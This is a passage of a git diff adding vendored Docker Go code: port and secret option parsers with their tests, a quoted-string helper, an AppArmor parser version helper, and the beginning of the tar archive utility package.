+				{
+					Protocol:    "tcp",
+					TargetPort:  80,
+					PublishMode: swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "80:8080",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    8080,
+					PublishedPort: 80,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "8080:80/tcp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    80,
+					PublishedPort: 8080,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "80:8080/udp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "udp",
+					TargetPort:    8080,
+					PublishedPort: 80,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "80-81:8080-8081/tcp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    8080,
+					PublishedPort: 80,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+				{
+					Protocol:      "tcp",
+					TargetPort:    8081,
+					PublishedPort: 81,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "80-82:8080-8082/udp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "udp",
+					TargetPort:    8080,
+					PublishedPort: 80,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+				{
+					Protocol:      "udp",
+					TargetPort:    8081,
+					PublishedPort: 81,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+				{
+					Protocol:      "udp",
+					TargetPort:    8082,
+					PublishedPort: 82,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+	}
+	for _, tc := range testCases {
+		var port PortOpt
+		assert.NilError(t, port.Set(tc.value))
+		assert.Equal(t, len(port.Value()), len(tc.expected))
+		for _, expectedPortConfig := range tc.expected {
+			assertContains(t, port.Value(), expectedPortConfig)
+		}
+	}
+}
+
+func TestPortOptValidComplexSyntax(t *testing.T) {
+	testCases := []struct {
+		value    string
+		expected []swarm.PortConfig
+	}{
+		{
+			value: "target=80",
+			expected: []swarm.PortConfig{
+				{
+					TargetPort:  80,
+					Protocol:    "tcp",
+					PublishMode: swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "target=80,protocol=tcp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:    "tcp",
+					TargetPort:  80,
+					PublishMode: swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "target=80,published=8080,protocol=tcp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    80,
+					PublishedPort: 8080,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "published=80,target=8080,protocol=tcp",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    8080,
+					PublishedPort: 80,
+					PublishMode:   swarm.PortConfigPublishModeIngress,
+				},
+			},
+		},
+		{
+			value: "target=80,published=8080,protocol=tcp,mode=host",
+			expected: []swarm.PortConfig{
+				{
+					Protocol:      "tcp",
+					TargetPort:    80,
+					PublishedPort: 8080,
+					PublishMode:   "host",
+				},
+			},
+		},
+		{
+			value: "target=80,published=8080,mode=host",
+			expected: []swarm.PortConfig{
+				{
+					TargetPort:    80,
+					PublishedPort: 8080,
+					PublishMode:   "host",
+					Protocol:      "tcp",
+				},
+			},
+		},
+		{
+			value: "target=80,published=8080,mode=ingress",
+			expected: []swarm.PortConfig{
+				{
+					TargetPort:    80,
+					PublishedPort: 8080,
+					PublishMode:   "ingress",
+					Protocol:      "tcp",
+				},
+			},
+		},
+	}
+	for _, tc := range testCases {
+		var port PortOpt
+		assert.NilError(t, port.Set(tc.value))
+		assert.Equal(t, len(port.Value()), len(tc.expected))
+		for _, expectedPortConfig := range tc.expected {
+			assertContains(t, port.Value(), expectedPortConfig)
+		}
+	}
+}
+
+func TestPortOptInvalidComplexSyntax(t *testing.T) {
+	testCases := []struct {
+		value         string
+		expectedError string
+	}{
+		{
+			value:         "invalid,target=80",
+			expectedError: "invalid field",
+		},
+		{
+			value:         "invalid=field",
+			expectedError: "invalid field",
+		},
+		{
+			value:         "protocol=invalid",
+			expectedError: "invalid protocol value",
+		},
+		{
+			value:         "target=invalid",
+			expectedError: "invalid syntax",
+		},
+		{
+			value:         "published=invalid",
+			expectedError: "invalid syntax",
+		},
+		{
+			value:         "mode=invalid",
+			expectedError: "invalid publish mode value",
+		},
+		{
+			value:         "published=8080,protocol=tcp,mode=ingress",
+			expectedError: "missing mandatory field",
+		},
+		{
+			value:         `target=80,protocol="tcp,mode=ingress"`,
+			expectedError: "non-quoted-field",
+		},
+		{
+			value:         `target=80,"protocol=tcp,mode=ingress"`,
+			expectedError: "invalid protocol value",
+		},
+	}
+	for _, tc := range testCases {
+		var port PortOpt
+		assert.Error(t, port.Set(tc.value), tc.expectedError)
+	}
+}
+
+func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) {
+	var contains = false
+	for _, portConfig := range portConfigs {
+		if portConfig == expected {
+			contains = true
+			break
+		}
+	}
+	if !contains {
+		t.Errorf("expected %v to contain %v, did not", portConfigs, expected)
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go
new file mode 100644
index 0000000000..fb1e5374bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/quotedstring.go
@@ -0,0 +1,37 @@
+package opts
+
+// QuotedString is a string that may have extra quotes around the value. The
+// quotes are stripped from the value.
+type QuotedString struct {
+	value *string
+}
+
+// Set sets a new value
+func (s *QuotedString) Set(val string) error {
+	*s.value = trimQuotes(val)
+	return nil
+}
+
+// Type returns the type of the value
+func (s *QuotedString) Type() string {
+	return "string"
+}
+
+func (s *QuotedString) String() string {
+	return string(*s.value)
+}
+
+func trimQuotes(value string) string {
+	lastIndex := len(value) - 1
+	for _, char := range []byte{'\'', '"'} {
+		if value[0] == char && value[lastIndex] == char {
+			return value[1:lastIndex]
+		}
+	}
+	return value
+}
+
+// NewQuotedString returns a new quoted string option
+func NewQuotedString(value *string) *QuotedString {
+	return &QuotedString{value: value}
+}
diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go
new file mode 100644
index 0000000000..0ebf04bbe0
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go
@@ -0,0 +1,28 @@
+package opts
+
+import (
+	"github.com/docker/docker/pkg/testutil/assert"
+	"testing"
+)
+
+func TestQuotedStringSetWithQuotes(t *testing.T) {
+	value := ""
+	qs := NewQuotedString(&value)
+	assert.NilError(t, qs.Set("\"something\""))
+	assert.Equal(t, qs.String(), "something")
+	assert.Equal(t, value, "something")
+}
+
+func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) {
+	value := ""
+	qs := NewQuotedString(&value)
+	assert.NilError(t, qs.Set("\"something'"))
+	assert.Equal(t, qs.String(), "\"something'")
+}
+
+func TestQuotedStringSetWithNoQuotes(t *testing.T) {
+	value := ""
+	qs := NewQuotedString(&value)
+	assert.NilError(t, qs.Set("something"))
+	assert.Equal(t, qs.String(), "something")
+}
diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go
new file mode 100644
index 0000000000..1fefcf8434
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/secret.go
@@ -0,0 +1,107 @@
+package opts
+
+import (
+	"encoding/csv"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+)
+
+// SecretOpt is a Value type for parsing secrets
+type SecretOpt struct {
+	values []*types.SecretRequestOption
+}
+
+// Set a new secret value
+func (o *SecretOpt) Set(value string) error {
+	csvReader := csv.NewReader(strings.NewReader(value))
+	fields, err := csvReader.Read()
+	if err != nil {
+		return err
+	}
+
+	options := &types.SecretRequestOption{
+		Source: "",
+		Target: "",
+		UID:    "0",
+		GID:    "0",
+		Mode:   0444,
+	}
+
+	// support a simple syntax of --secret foo
+	if len(fields) == 1 {
+		options.Source = fields[0]
+		options.Target = fields[0]
+		o.values = append(o.values, options)
+		return nil
+	}
+
+	for _, field := range fields {
+		parts := strings.SplitN(field, "=", 2)
+		key := strings.ToLower(parts[0])
+
+		if len(parts) != 2 {
+			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
+		}
+
+		value := parts[1]
+		switch key {
+		case "source", "src":
+			options.Source = value
+		case "target":
+			tDir, _ := filepath.Split(value)
+			if tDir != "" {
+				return fmt.Errorf("target must not be a path")
+			}
+			options.Target = value
+		case "uid":
+			options.UID = value
+		case "gid":
+			options.GID = value
+		case "mode":
+			m, err := strconv.ParseUint(value, 0, 32)
+			if err != nil {
+				return fmt.Errorf("invalid mode specified: %v", err)
+			}
+
+			options.Mode = os.FileMode(m)
+		default:
+			if len(fields) == 1 && value == "" {
+
+			} else {
+				return fmt.Errorf("invalid field in secret request: %s", key)
+			}
+		}
+	}
+
+	if options.Source == "" {
+		return fmt.Errorf("source is required")
+	}
+
+	o.values = append(o.values, options)
+	return nil
+}
+
+// Type returns the type of this option
+func (o *SecretOpt) Type() string {
+	return "secret"
+}
+
+// String returns a string repr of this option
+func (o *SecretOpt) String() string {
+	secrets := []string{}
+	for _, secret := range o.values {
+		repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target)
+		secrets = append(secrets, repr)
+	}
+	return strings.Join(secrets, ", ")
+}
+
+// Value returns the secret requests
+func (o *SecretOpt) Value() []*types.SecretRequestOption {
+	return o.values
+}
diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go
new file mode 100644
index 0000000000..d978c86e22
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/secret_test.go
@@ -0,0 +1,79 @@
+package opts
+
+import (
+	"os"
+	"testing"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestSecretOptionsSimple(t *testing.T) {
+	var opt SecretOpt
+
+	testCase := "app-secret"
+	assert.NilError(t, opt.Set(testCase))
+
+	reqs := opt.Value()
+	assert.Equal(t, len(reqs), 1)
+	req := reqs[0]
+	assert.Equal(t, req.Source, "app-secret")
+	assert.Equal(t, req.Target, "app-secret")
+	assert.Equal(t, req.UID, "0")
+	assert.Equal(t, req.GID, "0")
+}
+
+func TestSecretOptionsSourceTarget(t *testing.T) {
+	var opt SecretOpt
+
+	testCase := "source=foo,target=testing"
+	assert.NilError(t, opt.Set(testCase))
+
+	reqs := opt.Value()
+	assert.Equal(t, len(reqs), 1)
+	req := reqs[0]
+	assert.Equal(t, req.Source, "foo")
+	assert.Equal(t, req.Target, "testing")
+}
+
+func TestSecretOptionsShorthand(t *testing.T) {
+	var opt SecretOpt
+
+	testCase := "src=foo,target=testing"
+	assert.NilError(t, opt.Set(testCase))
+
+	reqs := opt.Value()
+	assert.Equal(t, len(reqs), 1)
+	req := reqs[0]
+	assert.Equal(t, req.Source, "foo")
+}
+
+func TestSecretOptionsCustomUidGid(t *testing.T) {
+	var opt SecretOpt
+
+	testCase := "source=foo,target=testing,uid=1000,gid=1001"
+	assert.NilError(t, opt.Set(testCase))
+
+	reqs := opt.Value()
+	assert.Equal(t, len(reqs), 1)
+	req := reqs[0]
+	assert.Equal(t, req.Source, "foo")
+	assert.Equal(t, req.Target, "testing")
+	assert.Equal(t, req.UID, "1000")
+	assert.Equal(t, req.GID, "1001")
+}
+
+func TestSecretOptionsCustomMode(t *testing.T) {
+	var opt SecretOpt
+
+	testCase := "source=foo,target=testing,uid=1000,gid=1001,mode=0444"
+	assert.NilError(t, opt.Set(testCase))
+
+	reqs := opt.Value()
+	assert.Equal(t, len(reqs), 1)
+	req := reqs[0]
+	assert.Equal(t, req.Source, "foo")
+	assert.Equal(t, req.Target, "testing")
+	assert.Equal(t, req.UID, "1000")
+	assert.Equal(t, req.GID, "1001")
+	assert.Equal(t, req.Mode, os.FileMode(0444))
+}
diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md
new file mode 100644
index 0000000000..c4b78a8ad8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/README.md
@@ -0,0 +1,11 @@
+pkg/ is a collection of utility packages used by the Docker project without being specific to its internals.
+
+Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible.
+If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the
+Docker organization, to facilitate re-use by other projects. However that is not the priority.
+
+The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core
+Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad!
+
+Because utility packages are small and neatly separated from the rest of the codebase, they are a good
+place to start for aspiring maintainers and contributors. Get in touch if you want to help maintain them!
diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
new file mode 100644
index 0000000000..ffcc5647a9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
@@ -0,0 +1,91 @@
+// Package aaparser is a convenience package interacting with `apparmor_parser`.
+package aaparser
+
+import (
+	"fmt"
+	"os/exec"
+	"strconv"
+	"strings"
+)
+
+const (
+	binary = "apparmor_parser"
+)
+
+// GetVersion returns the major and minor version of apparmor_parser.
+func GetVersion() (int, error) {
+	output, err := cmd("", "--version")
+	if err != nil {
+		return -1, err
+	}
+
+	return parseVersion(output)
+}
+
+// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to
+// replace the profile.
+func LoadProfile(profilePath string) error {
+	_, err := cmd("", "-r", profilePath)
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// cmd runs `apparmor_parser` with the passed arguments.
+func cmd(dir string, arg ...string) (string, error) {
+	c := exec.Command(binary, arg...)
+	c.Dir = dir
+
+	output, err := c.CombinedOutput()
+	if err != nil {
+		return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err)
+	}
+
+	return string(output), nil
+}
+
+// parseVersion takes the output from `apparmor_parser --version` and returns
+// a representation of the {major, minor, patch} version as a single number of
+// the form MMmmPPP {major, minor, patch}.
+func parseVersion(output string) (int, error) {
+	// output is in the form of the following:
+	// AppArmor parser version 2.9.1
+	// Copyright (C) 1999-2008 Novell Inc.
+	// Copyright 2009-2012 Canonical Ltd.
+
+	lines := strings.SplitN(output, "\n", 2)
+	words := strings.Split(lines[0], " ")
+	version := words[len(words)-1]
+
+	// split by major minor version
+	v := strings.Split(version, ".")
+	if len(v) == 0 || len(v) > 3 {
+		return -1, fmt.Errorf("parsing version failed for output: `%s`", output)
+	}
+
+	// Default the versions to 0.
+	var majorVersion, minorVersion, patchLevel int
+
+	majorVersion, err := strconv.Atoi(v[0])
+	if err != nil {
+		return -1, err
+	}
+
+	if len(v) > 1 {
+		minorVersion, err = strconv.Atoi(v[1])
+		if err != nil {
+			return -1, err
+		}
+	}
+	if len(v) > 2 {
+		patchLevel, err = strconv.Atoi(v[2])
+		if err != nil {
+			return -1, err
+		}
+	}
+
+	// major*10^5 + minor*10^3 + patch*10^0
+	numericVersion := majorVersion*1e5 + minorVersion*1e3 + patchLevel
+	return numericVersion, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
new file mode 100644
index 0000000000..69bc8d2fd8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
@@ -0,0 +1,73 @@
+package aaparser
+
+import (
+	"testing"
+)
+
+type versionExpected struct {
+	output  string
+	version int
+}
+
+func TestParseVersion(t *testing.T) {
+	versions := []versionExpected{
+		{
+			output: `AppArmor parser version 2.10
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 210000,
+		},
+		{
+			output: `AppArmor parser version 2.8
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 208000,
+		},
+		{
+			output: `AppArmor parser version 2.20
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 220000,
+		},
+		{
+			output: `AppArmor parser version 2.05
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 205000,
+		},
+		{
+			output: `AppArmor parser version 2.9.95
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 209095,
+		},
+		{
+			output: `AppArmor parser version 3.14.159
+Copyright (C) 1999-2008 Novell Inc.
+Copyright 2009-2012 Canonical Ltd.
+
+`,
+			version: 314159,
+		},
+	}
+
+	for _, v := range versions {
+		version, err := parseVersion(v.output)
+		if err != nil {
+			t.Fatalf("expected error to be nil for %#v, got: %v", v, err)
+		}
+		if version != v.version {
+			t.Fatalf("expected version to be %d, was %d, for: %#v\n", v.version, version, v)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/README.md b/vendor/github.com/docker/docker/pkg/archive/README.md
new file mode 100644
index 0000000000..7307d9694f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/README.md
@@ -0,0 +1 @@
+This code provides helper functions for dealing with archive files.
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go
new file mode 100644
index 0000000000..3261c4f498
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/archive.go
@@ -0,0 +1,1175 @@
+package archive
+
+import (
+	"archive/tar"
+	"bufio"
+	"bytes"
+	"compress/bzip2"
+	"compress/gzip"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/promise"
+	"github.com/docker/docker/pkg/system"
+)
+
+type (
+	// Compression is the state represents if compressed or not.
+	Compression int
+	// WhiteoutFormat is the format of whiteouts unpacked
+	WhiteoutFormat int
+	// TarChownOptions wraps the chown options UID and GID.
+	TarChownOptions struct {
+		UID, GID int
+	}
+
+	// TarOptions wraps the tar options.
+	TarOptions struct {
+		IncludeFiles     []string
+		ExcludePatterns  []string
+		Compression      Compression
+		NoLchown         bool
+		UIDMaps          []idtools.IDMap
+		GIDMaps          []idtools.IDMap
+		ChownOpts        *TarChownOptions
+		IncludeSourceDir bool
+		// WhiteoutFormat is the expected on disk format for whiteout files.
+		// This format will be converted to the standard format on pack
+		// and from the standard format on unpack.
+		WhiteoutFormat WhiteoutFormat
+		// When unpacking, specifies whether overwriting a directory with a
+		// non-directory is allowed and vice versa.
+		NoOverwriteDirNonDir bool
+		// For each include when creating an archive, the included name will be
+		// replaced with the matching name from this map.
+		RebaseNames map[string]string
+		InUserNS    bool
+	}
+
+	// Archiver allows the reuse of most utility functions of this package
+	// with a pluggable Untar function. Also, to facilitate the passing of
+	// specific id mappings for untar, an archiver can be created with maps
+	// which will then be passed to Untar operations
+	Archiver struct {
+		Untar   func(io.Reader, string, *TarOptions) error
+		UIDMaps []idtools.IDMap
+		GIDMaps []idtools.IDMap
+	}
+
+	// breakoutError is used to differentiate errors related to breaking out
+	// When testing archive breakout in the unit tests, this error is expected
+	// in order for the test to pass.
+	breakoutError error
+)
+
+var (
+	// ErrNotImplemented is the error message of function not implemented.
+	ErrNotImplemented = errors.New("Function not implemented")
+	defaultArchiver   = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil}
+)
+
+const (
+	// HeaderSize is the size in bytes of a tar header
+	HeaderSize = 512
+)
+
+const (
+	// Uncompressed represents the uncompressed.
+	Uncompressed Compression = iota
+	// Bzip2 is bzip2 compression algorithm.
+	Bzip2
+	// Gzip is gzip compression algorithm.
+	Gzip
+	// Xz is xz compression algorithm.
+	Xz
+)
+
+const (
+	// AUFSWhiteoutFormat is the default format for whiteouts
+	AUFSWhiteoutFormat WhiteoutFormat = iota
+	// OverlayWhiteoutFormat formats whiteout according to the overlay
+	// standard.
+	OverlayWhiteoutFormat
+)
+
+// IsArchive checks for the magic bytes of a tar or any supported compression
+// algorithm.
+func IsArchive(header []byte) bool {
+	compression := DetectCompression(header)
+	if compression != Uncompressed {
+		return true
+	}
+	r := tar.NewReader(bytes.NewBuffer(header))
+	_, err := r.Next()
+	return err == nil
+}
+
+// IsArchivePath checks if the (possibly compressed) file at the given path
+// starts with a tar file header.
+func IsArchivePath(path string) bool {
+	file, err := os.Open(path)
+	if err != nil {
+		return false
+	}
+	defer file.Close()
+	rdr, err := DecompressStream(file)
+	if err != nil {
+		return false
+	}
+	r := tar.NewReader(rdr)
+	_, err = r.Next()
+	return err == nil
+}
+
+// DetectCompression detects the compression algorithm of the source.
+func DetectCompression(source []byte) Compression {
+	for compression, m := range map[Compression][]byte{
+		Bzip2: {0x42, 0x5A, 0x68},
+		Gzip:  {0x1F, 0x8B, 0x08},
+		Xz:    {0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00},
+	} {
+		if len(source) < len(m) {
+			logrus.Debug("Len too short")
+			continue
+		}
+		if bytes.Compare(m, source[:len(m)]) == 0 {
+			return compression
+		}
+	}
+	return Uncompressed
+}
+
+func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) {
+	args := []string{"xz", "-d", "-c", "-q"}
+
+	return cmdStream(exec.Command(args[0], args[1:]...), archive)
+}
+
+// DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive.
+func DecompressStream(archive io.Reader) (io.ReadCloser, error) {
+	p := pools.BufioReader32KPool
+	buf := p.Get(archive)
+	bs, err := buf.Peek(10)
+	if err != nil && err != io.EOF {
+		// Note: we'll ignore any io.EOF error because there are some odd
+		// cases where the layer.tar file will be empty (zero bytes) and
+		// that results in an io.EOF from the Peek() call. So, in those
+		// cases we'll just treat it as a non-compressed stream and
+		// that means just create an empty layer.
+		// See Issue 18170
+		return nil, err
+	}
+
+	compression := DetectCompression(bs)
+	switch compression {
+	case Uncompressed:
+		readBufWrapper := p.NewReadCloserWrapper(buf, buf)
+		return readBufWrapper, nil
+	case Gzip:
+		gzReader, err := gzip.NewReader(buf)
+		if err != nil {
+			return nil, err
+		}
+		readBufWrapper := p.NewReadCloserWrapper(buf, gzReader)
+		return readBufWrapper, nil
+	case Bzip2:
+		bz2Reader := bzip2.NewReader(buf)
+		readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader)
+		return readBufWrapper, nil
+	case Xz:
+		xzReader, chdone, err := xzDecompress(buf)
+		if err != nil {
+			return nil, err
+		}
+		readBufWrapper := p.NewReadCloserWrapper(buf, xzReader)
+		return ioutils.NewReadCloserWrapper(readBufWrapper, func() error {
+			<-chdone
+			return readBufWrapper.Close()
+		}), nil
+	default:
+		return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension())
+	}
+}
+
+// CompressStream compresseses the dest with specified compression algorithm.
+func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) {
+	p := pools.BufioWriter32KPool
+	buf := p.Get(dest)
+	switch compression {
+	case Uncompressed:
+		writeBufWrapper := p.NewWriteCloserWrapper(buf, buf)
+		return writeBufWrapper, nil
+	case Gzip:
+		gzWriter := gzip.NewWriter(dest)
+		writeBufWrapper := p.NewWriteCloserWrapper(buf, gzWriter)
+		return writeBufWrapper, nil
+	case Bzip2, Xz:
+		// archive/bzip2 does not support writing, and there is no xz support at all
+		// However, this is not a problem as docker only currently generates gzipped tars
+		return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension())
+	default:
+		return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension())
+	}
+}
+
+// Extension returns the extension of a file that uses the specified compression algorithm.
+func (compression *Compression) Extension() string {
+	switch *compression {
+	case Uncompressed:
+		return "tar"
+	case Bzip2:
+		return "tar.bz2"
+	case Gzip:
+		return "tar.gz"
+	case Xz:
+		return "tar.xz"
+	}
+	return ""
+}
+
+type tarWhiteoutConverter interface {
+	ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error)
+	ConvertRead(*tar.Header, string) (bool, error)
+}
+
+type tarAppender struct {
+	TarWriter *tar.Writer
+	Buffer    *bufio.Writer
+
+	// for hardlink mapping
+	SeenFiles map[uint64]string
+	UIDMaps   []idtools.IDMap
+	GIDMaps   []idtools.IDMap
+
+	// For packing and unpacking whiteout files in the
+	// non standard format. The whiteout files defined
+	// by the AUFS standard are used as the tar whiteout
+	// standard.
+	WhiteoutConverter tarWhiteoutConverter
+}
+
+// canonicalTarName provides a platform-independent and consistent posix-style
+//path for files and directories to be archived regardless of the platform.
+func canonicalTarName(name string, isDir bool) (string, error) {
+	name, err := CanonicalTarNameForPath(name)
+	if err != nil {
+		return "", err
+	}
+
+	// suffix with '/' for directories
+	if isDir && !strings.HasSuffix(name, "/") {
+		name += "/"
+	}
+	return name, nil
+}
+
+// addTarFile adds to the tar archive a file from `path` as `name`
+func (ta *tarAppender) addTarFile(path, name string) error {
+	fi, err := os.Lstat(path)
+	if err != nil {
+		return err
+	}
+
+	link := ""
+	if fi.Mode()&os.ModeSymlink != 0 {
+		if link, err = os.Readlink(path); err != nil {
+			return err
+		}
+	}
+
+	hdr, err := tar.FileInfoHeader(fi, link)
+	if err != nil {
+		return err
+	}
+	hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
+
+	name, err = canonicalTarName(name, fi.IsDir())
+	if err != nil {
+		return fmt.Errorf("tar: cannot canonicalize path: %v", err)
+	}
+	hdr.Name = name
+
+	inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys())
+	if err != nil {
+		return err
+	}
+
+	// if it's not a directory and has more than 1 link,
+	// it's hard linked, so set the type flag accordingly
+	if !fi.IsDir() && hasHardlinks(fi) {
+		// a link should have a name that it links too
+		// and that linked name should be first in the tar archive
+		if oldpath, ok := ta.SeenFiles[inode]; ok {
+			hdr.Typeflag = tar.TypeLink
+			hdr.Linkname = oldpath
+			hdr.Size = 0 // This Must be here for the writer math to add up!
+		} else {
+			ta.SeenFiles[inode] = name
+		}
+	}
+
+	capability, _ := system.Lgetxattr(path, "security.capability")
+	if capability != nil {
+		hdr.Xattrs = make(map[string]string)
+		hdr.Xattrs["security.capability"] = string(capability)
+	}
+
+	//handle re-mapping container ID mappings back to host ID mappings before
+	//writing tar headers/files. We skip whiteout files because they were written
+	//by the kernel and already have proper ownership relative to the host
+	if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) {
+		uid, gid, err := getFileUIDGID(fi.Sys())
+		if err != nil {
+			return err
+		}
+		xUID, err := idtools.ToContainer(uid, ta.UIDMaps)
+		if err != nil {
+			return err
+		}
+		xGID, err := idtools.ToContainer(gid, ta.GIDMaps)
+		if err != nil {
+			return err
+		}
+		hdr.Uid = xUID
+		hdr.Gid = xGID
+	}
+
+	if ta.WhiteoutConverter != nil {
+		wo, err := ta.WhiteoutConverter.ConvertWrite(hdr, path, fi)
+		if err != nil {
+			return err
+		}
+
+		// If a new whiteout file exists, write original hdr, then
+		// replace hdr with wo to be written after. Whiteouts should
+		// always be written after the original. Note the original
+		// hdr may have been updated to be a whiteout with returning
+		// a whiteout header
+		if wo != nil {
+			if err := ta.TarWriter.WriteHeader(hdr); err != nil {
+				return err
+			}
+			if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 {
+				return fmt.Errorf("tar: cannot use whiteout for non-empty file")
+			}
+			hdr = wo
+		}
+	}
+
+	if err := ta.TarWriter.WriteHeader(hdr); err != nil {
+		return err
+	}
+
+	if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 {
+		// We use system.OpenSequential to ensure we use sequential file
+		// access on Windows to avoid depleting the standby list.
+		// On Linux, this equates to a regular os.Open.
+		file, err := system.OpenSequential(path)
+		if err != nil {
+			return err
+		}
+
+		ta.Buffer.Reset(ta.TarWriter)
+		defer ta.Buffer.Reset(nil)
+		_, err = io.Copy(ta.Buffer, file)
+		file.Close()
+		if err != nil {
+			return err
+		}
+		err = ta.Buffer.Flush()
+		if err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error {
+	// hdr.Mode is in linux format, which we can use for sycalls,
+	// but for os.Foo() calls we need the mode converted to os.FileMode,
+	// so use hdrInfo.Mode() (they differ for e.g. setuid bits)
+	hdrInfo := hdr.FileInfo()
+
+	switch hdr.Typeflag {
+	case tar.TypeDir:
+		// Create directory unless it exists as a directory already.
+		// In that case we just want to merge the two
+		if fi, err := os.Lstat(path); !(err == nil && fi.IsDir()) {
+			if err := os.Mkdir(path, hdrInfo.Mode()); err != nil {
+				return err
+			}
+		}
+
+	case tar.TypeReg, tar.TypeRegA:
+		// Source is regular file. We use system.OpenFileSequential to use sequential
+		// file access to avoid depleting the standby list on Windows.
+		// On Linux, this equates to a regular os.OpenFile
+		file, err := system.OpenFileSequential(path, os.O_CREATE|os.O_WRONLY, hdrInfo.Mode())
+		if err != nil {
+			return err
+		}
+		if _, err := io.Copy(file, reader); err != nil {
+			file.Close()
+			return err
+		}
+		file.Close()
+
